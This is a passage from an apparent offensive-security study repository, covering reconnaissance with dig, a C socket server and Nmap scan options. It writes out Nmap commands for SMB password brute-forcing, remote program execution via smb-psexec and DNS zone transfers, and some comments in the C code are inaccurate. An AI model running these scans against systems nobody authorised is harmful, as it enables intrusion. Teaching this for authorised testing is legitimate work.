210 | Dig: It collects data about Domain Name Servers, it's helpful to display DNS information.
211 | ```
212 | - ***It is pretty straight forward just open a terminal and run:***
213 | ```bash
214 | $~ dig <domain.com>
215 | ```
216 | ![image](https://user-images.githubusercontent.com/75253629/229323068-96d6a6ed-8a3e-442a-b5eb-7291b756752b.png)
217 | 
218 | ## Port Scanning
219 | ```
220 | Its the process of inspecting TCP & UDP ports on a machine to detect what services they are running and what potential attacks may exist.
221 | We can run a full port scan on a target in the background while we do other information gathering.
222 | When port scanning is finished we can then narrow our scans to aim for more and more information.
223 | ```
224 | 
225 | ```
226 | We will start with understanding how sockets work and building them using C-language, I hope you are all familiar with c.
227 | ```
228 | - ***Sockets are usually made for server and user (client) interactions.***
229 | - ***We will code our own server and client.***
230 | 
231 | ```
232 | Server side:
233 | 
234 | For server side we use these functions:
235 | 
236 | socket(): To create a socket object, we will create a TCP socket which uses ipv4 for communication.
237 | bind(): To bind the server on a port and a host, which the host will be our machine ip and any port you like.
238 | listen(): To listen for incoming connections.
239 | accept(): To accept any connection that is coming.
240 | send(): After accepting connection we send data.
241 | recv(): After accepting connection we receive data.
242 | 
243 | These are all included within the sys/socket.h header which we will import.
244 | The functions until now are self-explanatory, but we will further explain them.
245 | ```
246 | 
247 | ```
248 | Client Side:
249 | 
250 | We will be using winsock2 library on windows for programming our client.
251 | 
252 | For client side we use these functions:
253 | 
254 | socket(): To create a socket object.
255 | connect(): Connect to the server side.
256 | send(): Send to the server side.
257 | recv(): Receive from the server side.
258 | 
259 | Because I will be using windows as my client, I should use winsock2.
260 | But if you want to use a linux client such as: kali linux, you should use the sys/socket.h header we mentioned above.
261 | 
262 | No difference between winsocks2 and sys/socket.h, its just a simple syntax difference.
263 | No need to understand these stuff for now, just understand the workflow and you are good to go.
264 | ```
265 | ```c
266 | /*
267 | This code is meant to be executed in a linux machine.
268 | */
269 | 
270 | #include <stdio.h>
271 | #include <sys/socket.h>
272 | #include <sys/types.h>
273 | #include <netinet/in.h>
274 | #include <stdlib.h>
275 | 
276 | int main()
277 | {
278 |     // Integer variable for creating the socket
279 |     int server_socket;
280 | 
281 |     /*
282 |         Creating the TCP socket: socket(domain, type, protocol)
283 | 
284 |         AF_INET: Means that we have to use the ipv4 address, if we use AF_INET6 it would be ipv6, etc.
285 |         SOCK_STREAM: Means that we are going to use TCP protocol, if we use SOCK_DGRAM it would be UDP, etc.
286 |         0: Means that we are going to use the default protocol which is TCP, if we use 1 it would be UDP, etc.
287 | 
288 |         Read more: https://www.geeksforgeeks.org/socket-programming-cc/
289 |     */
290 |     server_socket = socket(AF_INET, SOCK_STREAM, 0);
291 | 
292 |     // Structure required for the connection to be accepted ( bind() )
293 |     // A structure is a collection of variables of different types
294 |     struct sockaddr_in server_address;
295 | 
296 |     /*
297 |         IMPORTANT: These structure .sin_family, .sin_port, .sin_addr.s_addr are used to store the address of the client which came from the header <netinet/in.h>
298 |     */
299 | 
300 |     // This is the structure that will be used to store the client address
301 |     server_address.sin_family = AF_INET;
302 | 
303 |     // This is the port that will be used for the connection
304 |     // htons() function is used to convert the port number to the correct format, 9002 is the port number, it can be any number
305 |     server_address.sin_port = htons(1337);
306 | 
307 |     // This is the IP address that will be used for the connection
308 |     // inet_addr() function is used to convert the IP address to the correct format
309 |     server_address.sin_addr.s_addr = inet_addr("YOUR IP ADDRESS");
310 | 
311 |     // --------------------------------------------------------------------------------------------------------------
312 | 
313 |     /*
314 |         Binding the socket to our specified IP and port: bind(socket, address, address_len)
315 | 
316 |         1. Pass the socket that we created before
317 |         2. Pass a pointer to the structure that we created before, (struct server_address *) "*" is used to convert the structure to a pointer
318 |         3. Pass the address of the structure that we created before ( &server_address ) "&" is used to get the address of the variable
319 |         4. Pass the size of the structure, sizeof(server_address) is used to get the size of the variable
320 | 
321 |         Manual for bind(): https://man7.org/linux/man-pages/man2/bind.2.html
322 |     */
323 |     bind(server_socket, (struct server_address *)&server_address, sizeof(server_address));
324 | 
325 |     // --------------------------------------------------------------------------------------------------------------
326 | 
327 |     /*
328 |         Listening for connections: listen(socket, backlog)
329 | 
330 |         1. Pass the socket that we created before
331 |         2. Pass the backlog, 5 is used because it is the maximum number of connections that can be queued
332 | 
333 |         Manual for listen(): https://man7.org/linux/man-pages/man2/listen.2.html
334 |     */
335 |     listen(server_socket, 5);
336 | 
337 |     // --------------------------------------------------------------------------------------------------------------
338 | 
339 |     // Used for accepting the connection
340 |     int client_socket;
341 | 
342 |     /*
343 |         Accepting the connection: accept(socket, address, address_len)
344 | 
345 |         It takes 3 arguments, the socket, the address of the client and the size of the address
346 |         NULL is used because we don't need the address of the client and the size of the address
347 | 
348 |         Manual for accept(): https://man7.org/linux/man-pages/man2/accept.2.html
349 |     */
350 |     client_socket = accept(server_socket, NULL, NULL);
351 |     printf("Client connected! \n");
352 | 
353 |     // --------------------------------------------------------------------------------------------------------------
354 | 
355 |     // This server_message variable will be sent to the client when the connection is accepted
356 |     char server_message[256] = "You have reached the server!";
357 |     // This client_message variable will be sent to the server when the connection is accepted
358 |     char client_message[256] = "You have reached the client!";
359 | 
360 |     /*
361 |         Sending the message to the client: send(socket, message, message_len, flags)
362 | 
363 |         1. Pass the socket that we created before
364 |         2. Pass the message that we want to send
365 |         3. Pass the size of the message, sizeof(server_message) is used to get the size of the variable
366 |         4. Pass the flags, 0 is used because we don't need any flags
367 | 
368 |         Manual for send(): https://man7.org/linux/man-pages/man2/send.2.html
369 |     */
370 |     send(client_socket, server_message, sizeof(server_message), 0);
371 |     recv(client_socket, client_message, sizeof(client_message), 0);
372 |     printf("Client sent: %s \n", client_message);
373 | 
374 |     // --------------------------------------------------------------------------------------------------------------
375 | 
376 |     // Closing the socket
377 |     close(server_socket);
378 | 
379 |     return 0;
380 | }
381 | ```
382 | - ***Now we compile the code using:***
383 | ```bash
384 | gcc <filename.c> -o <filename>
385 | ```
386 | - ***Then execute it and run netcat tool to test the server using:***
387 | ```bash
388 | nc <your_host_ip> <port_number_in_code>
389 | ```
390 | 
391 | ![image](https://user-images.githubusercontent.com/75253629/231733636-2e71e942-8f0f-416b-a7f7-631f447f95de.png)
392 | 
393 | ```
394 | Now, I hope you understood the basics of sockets and how they work.
395 | 
396 | This is important because port scanning deals with alot of sockets and understanding them is essential.
397 | 
398 | We could still code a client side but I left this as a challenge to you.
399 | ```
400 | 
401 | ## Nmap
402 | 
403 | ```
404 | Nmap is the most popular port scanner available, 
405 | Its simply a network mapper to discover devices on a network.
406 | 
407 | A default nmap scan will scan 1,000 most popular ports on a given machine.
408 | ```
409 | ```
410 | Why we need to discover devices?
411 | We can't hack a machine without knowing the services running on it.
412 | ```
413 | ```
414 | How does Nmap work?
415 | ```
416 | - ***Nmap sends messages using sockets from its server (like the one we coded before), but nmap code is much complicated.***
417 | - ***Nmap sends messages using sockets to the host ports, if a port responds to nmap, its identified as open.***
418 | 
419 | ![image](https://user-images.githubusercontent.com/75253629/232224690-e298430f-f9c0-4812-923e-03922b9eb373.png)
420 | 
421 | ```
422 | Note: nmap is not 100% accurate and may sometimes output false-positives.
423 | ```
424 | 
425 | ### Nmap scan types:
426 | 
427 | ```
428 | nmap [ScanType] [Options] <target>
429 | 
430 | Note: If no port range is specified, Nmap scans the 1,000 most popular ports.
431 | ```
432 | - `-p <port1>-<port2>`: *Scans a port range*
433 | - `-p <port1>,<port2>,...`: *Scans a port list*
434 | - `-pU:53,U:110,T20-445`: *Mix TCP and UDP*
435 | - `-r`: *Scans linearly (does not randomize ports)*
436 | - `--top-ports <n>`: *Scan n number of most popular ports*
437 | - `-p-65535`: *Leaving off the initial port in range makes Nmap scan start at port 1*
438 | - `-p-`: *Leaving off the end port in range makes Nmap scan all ports*
439 | - `-F`: *(Fast (limited port) scan)*
440 | 
441 | ### Port Status
442 | 
443 | - **Open:** This indicates that an application is listening for connections on this port.
444 | - **Closed:** This indicates that the probes were received but there is no application listening on this port.
445 | - **Filtered:** This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering.
446 | - **Unfiltered:** This indicates that the probes were received but a state could not be established.
447 | - **Open/Filtered:** This indicates that the port was filtered or open but Nmap couldn’t establish the state.
448 | - **Closed/Filtered:** This indicates that the port was filtered or closed but Nmap couldn’t establish the state.
449 | 
450 | ![image](https://user-images.githubusercontent.com/75253629/231770904-94a906c1-5a53-4dda-8f1b-56d82586bfc0.png)
451 | 
452 | ### Scan Types
453 | 
454 | - `-sn`: *Probe only (host discovery, not port scan)*
455 | - `-sS`: *SYN Scan*
456 | - `-sT`: *TCP Connect Scan*
457 | - `-sU`: *UDP Scan*
458 | - `-sV`: *Version Scan*
459 | - `-O`: *Used for OS Detection/fingerprinting*
460 | - `--scanflags`: *Sets custom list of TCP using* `URG ACK PSH RST SYN FIN` *in any order*
461 | 
462 | ### Exploring (Probing) Options
463 | 
464 | - `-Pn`: *Don't probe (assume all hosts are up)*
465 | - `-PB`: *Default probe (TCP 80, 445 & ICMP)*
466 | - `-PS<portlist>` : *Checks if ssytems are online by probing TCP ports*
467 | - `-PE`: *Using ICMP Echo Request*
468 | - `-PP`: *Using ICMP Timestamp Request*
469 | - `-PM`: *Using ICMP Netmask Request*
470 | 
471 | ### Timing Options
472 | 
473 | - `-T0` *(Paranoid): Very slow, used for IDS evasion*
474 | - `-T1` *(Sneaky): Quite slow, used for IDS evasion*
475 | - `-T2` *(Polite): Slows down to consume less bandwidth, runs ~10 times slower than default*
476 | - `-T3` *(Normal): Default, a dynamic timing model based on target responsiveness*
477 | - `-T4` *(Aggressive): Assumes a fast and reliable network and may overwhelm targets*
478 | - `-T5` *(Insane): Very aggressive; will likely overwhelm targets or miss open ports*
479 | 
480 | ### Nmap Scripting Engine
481 | 
482 | - **The full list of Nmap Scripting Engine scripts: [http://nmap.org/nsedoc/](http://nmap.org/nsedoc/)**
483 | 
484 | ***Running Default scripts:*** `nmap -sC`
485 | 
486 | ***Running individual or groups of scripts:***
487 | `nmap --script=<ScriptName>| <ScriptCategory>|<ScriptDir>`
488 |   
489 | ***Using the list of script arguments:***
490 | `nmap --script-args=<Name1=Value1,...>`
491 | 
492 | ***Updating the script database:***
493 | `nmap --script-updatedb`
494 | 
495 | ```
496 | Some particularly useful scripts include:
497 | ```
498 | - **dns-zone-transfer: Attempts to pull a zone file (AXFR) from a DNS server.**
499 | ```
500 | $ nmap --script dns-zonetransfer.nse --script-args dns-zonetransfer.domain=<domain> -p 53 <hosts>
501 | ```
502 | 
503 | - **http-robots.txt: Harvests robots.txt files from discovered web servers.**
504 | ```
505 | $ nmap --script http-robots.txt <hosts>
506 | ```
507 | 
508 | - **smb-brute: Attempts to determine valid username and password combinations via automated guessing.**
509 | ```
510 | $ nmap --script smb-brute.nse -p 445 <hosts>
511 | ```
512 | 
513 | - **smb-psexec: Attempts to run a series of programs on the target machine, using credentials provided as scriptargs.**
514 | ```
515 | $ nmap --script smb-psexec.nse –script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p445 <hosts>
516 | ```
517 | 
518 | ### Nmap Scripting Engine Categories
519 | ```
520 | The most common Nmap scripting engine categories:
521 | ```
522 | - ***auth:*** Utilize credentials or bypass authentication on target hosts.
523 | - ***broadcast:*** Discover hosts not included on command line by broadcasting on local network.
524 | - ***brute:*** Attempt to guess passwords on target systems, for a variety of protocols, including http, SNMP, IAX, MySQL, VNC, etc.
525 | - ***default:*** Scripts run automatically when -sC or -A are used.
526 | - ***discovery:*** Try to learn more information about target hosts through public sources of information, SNMP, directory services, and more.
527 | - ***dos:*** May cause denial of service conditions in target hosts.
528 | - ***exploit:*** Attempt to exploit target systems.
529 | - ***external:*** Interact with third-party systems not included in target list.
530 | - ***fuzzer:*** Send unexpected input in network protocol fields.
531 | - ***intrusive:*** May crash target, consume excessive resources, or otherwise impact target machines in a malicious fashion.
532 | - ***malware:*** Look for signs of malware infection on the target hosts.
533 | - ***safe:*** Designed not to impact target in a negative fashion.
534 | - ***version:*** Measure the version of software or protocols on the target hosts.
535 | - ***vul:*** Measure whether target systems have a known vulnerability.
536 | 
537 | ### Output Options
538 | 
539 | - `-oN`: ***Standard Nmap output***
540 | - `-oG`: ***Greppable format***
541 | - `-oX`: ***XML format***
542 | - `-oA`: ***<basename> Generate Nmap, Greppable, and XML output files using basename for files***
543 |   
544 |  ### Bonus Options
545 |  
546 | - `-n`: ***Disables reverse IP address lookups***
547 | - `-6`: ***Uses IPv6 only***
548 | - `-A`: ***Uses several features, including OS Detection, Version Detection, Script Scanning (default), and traceroute***
549 | - `--reason`: ***Displays the reason Nmap thinks that the port is open, closed, or filtered***
550 |     
551 | ### Understand scans
552 |  
553 | ```
554 | Let's fire up our terminal, pick our target ( Will be http://scanme.nmap.org for this example )
555 | ```
556 |  - ***Firstly, I will do a host discovery to check all hosts available on the target domain.***
557 |     
558 | ```
559 | sudo nmap -sn <host>
560 | ```
561 |     
562 | ![image](https://user-images.githubusercontent.com/75253629/232224060-469a0f34-a889-4c56-80d5-fa1d60d7289c.png)
563 |     
564 | - ***Now, I picked a host and will do a syn-stealth scan, to get top 100 ports open, get the services versions, traceroute, operating system fingerprints, aggressive timing options and save results to a file.***
565 | 
566 | ```
567 | sudo nmap -sS --top-ports 100 -sV -O -A -T4 <host> -oG nmap_scan.txt
568 | ```
569 |     
570 | ![image](https://user-images.githubusercontent.com/75253629/232223554-1f0d9df7-a9f2-42d3-b364-f60cea4e4395.png)
571 | 
572 | ```
573 | We got alot of information from this scan, now lets break them down and remove any useless informations
574 | ```
575 |     
576 | - ***We got the first information which is an open port 22 which appears to be ssh service (openssh version 6.6) which is running on ubuntu OS.***
577 |  
578 | ![image](https://user-images.githubusercontent.com/75253629/232223722-d4bb5a92-9ae1-426f-8246-cadb5d54dd6f.png)
579 | 
580 | - ***The next 2 ports are smtp for email services that appears to be closed and http which indicates that this IP is running a web service which appears to be apache httpd 2.4.7 version also running on ubuntu OS.***
581 |     
582 | ![image](https://user-images.githubusercontent.com/75253629/232223863-d0f5a694-54c0-49c0-b5a3-ebc35c1e1e02.png)
583 | 
584 | - ***Finally, here we see the traceroute which is useful to map how information moved within a company's computer network and then focus their attacks on certain computers.***
585 |  
586 | ![image](https://user-images.githubusercontent.com/75253629/232223978-4af42694-ba8f-4cfc-9647-da14f28dc303.png)
587 | 
588 | ```
589 | Note: Its important to note that nmap scans is not 100% accurate and can lead to false-positives.
590 | ```
591 | - ***We will get to testing these services for vulnerablities in the [VulnerableOrNot](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x3-Tools/VulnerableOrNot) section.***
592 | - ***For now, just expirement different scan types & techniques we used to gather information and know how to use and understand them.***
593 | 


--------------------------------------------------------------------------------
/Start/0x3-Tools/InformationGathering/server_socket.c:
--------------------------------------------------------------------------------
  1 | /*
  2 | This code is meant to be executed in a linux machine.
  3 | */
  4 | 
  5 | #include <stdio.h>
  6 | #include <sys/socket.h>
  7 | #include <sys/types.h>
  8 | #include <netinet/in.h>
  9 | #include <stdlib.h>
 10 | 
 11 | int main()
 12 | {
 13 |     // Integer variable for creating the socket
 14 |     int server_socket;
 15 | 
 16 |     /*
 17 |     Creating the TCP socket: socket(domain, type, protocol)
 18 | 
 19 |     AF_INET: Means that we have to use the ipv4 address, if we use AF_INET6 it would be ipv6, etc.
 20 |     SOCK_STREAM: Means that we are going to use TCP protocol, if we use SOCK_DGRAM it would be UDP, etc.
 21 |     0: Means that we are going to use the default protocol which is TCP, if we use 1 it would be UDP, etc.
 22 | 
 23 |     Read more: https://www.geeksforgeeks.org/socket-programming-cc/
 24 |     */
 25 |     server_socket = socket(AF_INET, SOCK_STREAM, 0);
 26 | 
 27 |     // Structure required for the connection to be accepted ( bind() )
 28 |     // A structure is a collection of variables of different types
 29 |     struct sockaddr_in server_address;
 30 | 
 31 |     /*
 32 |         IMPORTANT: These structure .sin_family, .sin_port, .sin_addr.s_addr are used to store the address of the client which came from the header <netinet/in.h>
 33 |     */
 34 | 
 35 |     // This is the structure that will be used to store the client address
 36 |     server_address.sin_family = AF_INET;
 37 | 
 38 |     // This is the port that will be used for the connection
 39 |     // htons() function is used to convert the port number to the correct format, 9002 is the port number, it can be any number
 40 |     server_address.sin_port = htons(1337);
 41 | 
 42 |     // This is the IP address that will be used for the connection
 43 |     // inet_addr() function is used to convert the IP address to the correct format
 44 |     server_address.sin_addr.s_addr = inet_addr("YOUR IP ADDRESS");
 45 | 
 46 |     // --------------------------------------------------------------------------------------------------------------
 47 | 
 48 |     /*
 49 |     Binding the socket to our specified IP and port: bind(socket, address, address_len)
 50 | 
 51 |     1. Pass the socket that we created before
 52 |     2. Pass a pointer to the structure that we created before, (struct server_address *) "*" is used to convert the structure to a pointer
 53 |     3. Pass the address of the structure that we created before ( &server_address ) "&" is used to get the address of the variable
 54 |     4. Pass the size of the structure, sizeof(server_address) is used to get the size of the variable
 55 | 
 56 |     Manual for bind(): https://man7.org/linux/man-pages/man2/bind.2.html
 57 |     */
 58 |     bind(server_socket, (struct server_address *)&server_address, sizeof(server_address));
 59 | 
 60 |     // --------------------------------------------------------------------------------------------------------------
 61 | 
 62 |     /*
 63 |     Listening for connections: listen(socket, backlog)
 64 | 
 65 |     1. Pass the socket that we created before
 66 |     2. Pass the backlog, 5 is used because it is the maximum number of connections that can be queued
 67 | 
 68 |     Manual for listen(): https://man7.org/linux/man-pages/man2/listen.2.html
 69 |     */
 70 |     listen(server_socket, 5);
 71 | 
 72 |     // --------------------------------------------------------------------------------------------------------------
 73 | 
 74 |     // Used for accepting the connection
 75 |     int client_socket;
 76 | 
 77 |     /*
 78 |      Accepting the connection: accept(socket, address, address_len)
 79 | 
 80 |      It takes 3 arguments, the socket, the address of the client and the size of the address
 81 |      NULL is used because we don't need the address of the client and the size of the address
 82 | 
 83 |      Manual for accept(): https://man7.org/linux/man-pages/man2/accept.2.html
 84 |     */
 85 |     client_socket = accept(server_socket, NULL, NULL);
 86 |     printf("Client connected! \n");
 87 | 
 88 |     // --------------------------------------------------------------------------------------------------------------
 89 | 
 90 |     // This server_message variable will be sent to the client when the connection is accepted
 91 |     char server_message[256] = "You have reached the server!";
 92 |     // This client_message variable will be sent to the server when the connection is accepted
 93 |     char client_message[256] = "You have reached the client!";
 94 | 
 95 |     /*
 96 |     Sending the message to the client: send(socket, message, message_len, flags)
 97 | 
 98 |     1. Pass the socket that we created before
 99 |     2. Pass the message that we want to send
100 |     3. Pass the size of the message, sizeof(server_message) is used to get the size of the variable
101 |     4. Pass the flags, 0 is used because we don't need any flags
102 | 
103 |     Manual for send(): https://man7.org/linux/man-pages/man2/send.2.html
104 |     */
105 |     send(client_socket, server_message, sizeof(server_message), 0);
106 |     recv(client_socket, client_message, sizeof(client_message), 0);
107 |     printf("Client sent: %s \n", client_message);
108 | 
109 |     // --------------------------------------------------------------------------------------------------------------
110 | 
111 |     // Closing the socket
112 |     close(server_socket);
113 | 
114 |     return 0;
115 | }
116 | 


--------------------------------------------------------------------------------
/Start/0x3-Tools/PasswordAttacks/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smadi0x86/CSC-RedOps/803c46ad34455f7c6716ccf7cc5dffa4c4974699/Start/0x3-Tools/PasswordAttacks/README.md


--------------------------------------------------------------------------------
/Start/0x3-Tools/PrivilegeEscalation/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smadi0x86/CSC-RedOps/803c46ad34455f7c6716ccf7cc5dffa4c4974699/Start/0x3-Tools/PrivilegeEscalation/README.md


--------------------------------------------------------------------------------
/Start/0x3-Tools/README.md:
--------------------------------------------------------------------------------
 1 | <h1 align="center">
 2 |   <br>
 3 |   <a href="https://github.com/smadi0x86/CSC-RedOps"><img src="https://thumbs.gfycat.com/ScratchyAlertBergerpicard-max-1mb.gif" alt="tools.logo"></a>
 4 |   <br>
 5 |   </h1>
 6 | 
 7 | <h3 align="center">These cover most of the common used offensive tools divided into categories</h3>
 8 |  
 9 | <p align="center">
10 |   <a href="">
11 |    <img src=https://img.shields.io/badge/Red-Team-darkred>
12 |    <img src=https://img.shields.io/badge/Offensive-Tools-blue>
13 |   </a>
14 |   </p>
15 |   
16 | ### 🛠️ Tools Categories:
17 | 
18 | - [Information Gathering](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x3-Tools/InformationGathering)
19 | - [Vulnerable Or Not](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x3-Tools/VulnerableOrNot)
20 | - [Exploitation](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x3-Tools/Exploitation)
21 | - [Privilege Escalation](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x3-Tools/PrivilegeEscalation)
22 | - [Web Attacks](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x3-Tools/WebAttacks)
23 | - [Password Attacks](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x3-Tools/PasswordAttacks)
24 | - [Tunneling](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x3-Tools/Tunneling)
25 | - [Reporting](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x3-Tools/Reporting)
26 | 


--------------------------------------------------------------------------------
/Start/0x3-Tools/Reporting/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smadi0x86/CSC-RedOps/803c46ad34455f7c6716ccf7cc5dffa4c4974699/Start/0x3-Tools/Reporting/README.md


--------------------------------------------------------------------------------
/Start/0x3-Tools/Tunneling/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smadi0x86/CSC-RedOps/803c46ad34455f7c6716ccf7cc5dffa4c4974699/Start/0x3-Tools/Tunneling/README.md


--------------------------------------------------------------------------------
/Start/0x3-Tools/VulnerableOrNot/README.md:
--------------------------------------------------------------------------------
1 | # Vulnerability Discovery
2 | ```
3 | The Vulnerability scanning is an important part in the chain of attack.
4 | 
5 | In this section will provide an overview of automated vulnerability scanning tools and techniques.
6 | 
7 | While I prefer the manual, specialized tasks to identify vulnerabilities, that leverage our knowledge and experience.
8 | ```
9 | 


--------------------------------------------------------------------------------
/Start/0x3-Tools/WebAttacks/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smadi0x86/CSC-RedOps/803c46ad34455f7c6716ccf7cc5dffa4c4974699/Start/0x3-Tools/WebAttacks/README.md


--------------------------------------------------------------------------------
/Start/0x4-KillChain/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smadi0x86/CSC-RedOps/803c46ad34455f7c6716ccf7cc5dffa4c4974699/Start/0x4-KillChain/README.md


--------------------------------------------------------------------------------
/Start/README.md:
--------------------------------------------------------------------------------
 1 | <h1 align="center">
 2 |   <br>
 3 |   <a href="https://github.com/smadi0x86/CSC-RedOps"><img src="https://giffiles.alphacoders.com/156/15675.gif" alt="offsec.logo"></a>
 4 |   <br>
 5 |   </h1>
 6 |   
 7 |   ### 📚 Study Map:
 8 | 
 9 | + [0x1-Mindset](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x1-Mindset)
10 | + [0x2-Environment](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x2-Environment)
11 | + [0x3-Tools](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x3-Tools)
12 | + [0x4-Killchain](https://github.com/smadi0x86/CSC-RedOps/tree/main/Start/0x4-KillChain)
13 | 
14 | ## Getting Started
15 |   
16 | ```
17 | Hello this is smadi, I'll be happy to serve you this study path for the offensive operations section of CSC HTU.
18 | ```
19 | 
20 | ## Downloading the project
21 | 
22 | - ***Get a copy of the project by cloning or downloading it to your local machine and then you can run/customize it in your IDE.***
23 | 
24 | - ***You can clone the project by running this command in your terminal:***
25 | ```bash
26 | $~ git clone https://github.com/smadi0x86/CSC-RedOps.git
27 | ```
28 | - ***Equivalently you can download the project by clicking [Here](https://github.com/smadi0x86/CSC-RedOps/archive/refs/heads/main.zip) to download the .zip file.***
29 | 
30 | ## License
31 | 
32 | ```
33 | This project is licensed under the MIT License - see the LICENSE file for details.
34 | ```
35 | 
36 | ## Contributing
37 | 
38 | - ***Contributions are what make the open source community such an amazing place to be learn, inspire, and create.***
39 | - ***Any contributions you make are greatly appreciated.***
40 | 
41 | 1. ***Fork the Project***
42 | 2. ***Create your Feature Branch*** (`git checkout -b feature/AmazingFeature`)
43 | 3. ***Commit your Changes*** (`git commit -m 'Add some AmazingFeature'`)
44 | 4. ***Push to the Branch*** (`git push origin feature/AmazingFeature`)
45 | 5. ***Open a Pull Request***
46 | 


--------------------------------------------------------------------------------